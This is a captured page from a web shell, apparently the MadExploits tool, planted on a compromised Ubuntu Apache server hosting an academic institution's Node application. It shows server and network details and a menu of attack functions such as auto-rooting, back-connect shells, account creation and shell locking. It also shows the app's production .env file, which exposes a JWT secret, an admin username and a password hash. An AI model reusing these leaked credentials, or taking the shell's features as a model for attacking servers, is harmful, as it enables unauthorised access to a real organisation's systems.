Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
server /
[ HOME SHELL ]
Name
Size
Permission
Action
middleware
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.env
935
B
-rw-r--r--
.env.example
1.04
KB
-rw-r--r--
generate-credentials.cjs
2.1
KB
-rw-r--r--
index.js
4.6
KB
-rw-r--r--
package-lock.json
61.45
KB
-rw-r--r--
package.json
779
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .env
# Production Environment Configuration # Copy this file to .env on your production server and update the values # Server Configuration PORT=5000 NODE_ENV=production # JWT Secret - MUST CHANGE! Generate with: node -e "console.log(require('crypto').randomBytes(32).toString('hex'))" JWT_SECRET=db38843ed313d584edc500ea9843ab717aa2fbbc51223c8286549c4067788a6c # Admin Credentials # Generate password hash with: node -e "const bcrypt = require('bcryptjs'); console.log(bcrypt.hashSync('your-password', 10))" ADMIN_USERNAME=admincqt ADMIN_PASSWORD=$2a$10$Ze/3fjUwe6zZNXe0hvvOUuvTOCpQdYuHDCql7ZGqbc7vqAObHPxlC # Frontend URLs (for CORS) # Add all domains that should be allowed to access the API FRONTEND_URL=https://cqt.iiitd.ac.in PRODUCTION_URL=https://cqt.iiitd.ac.in # Optional: Use wildcard for subdomains # PRODUCTION_URL=https://*.iiitd.ac.in # Database (if you add one later) # DATABASE_URL=mongodb://localhost:27017/quantum
Close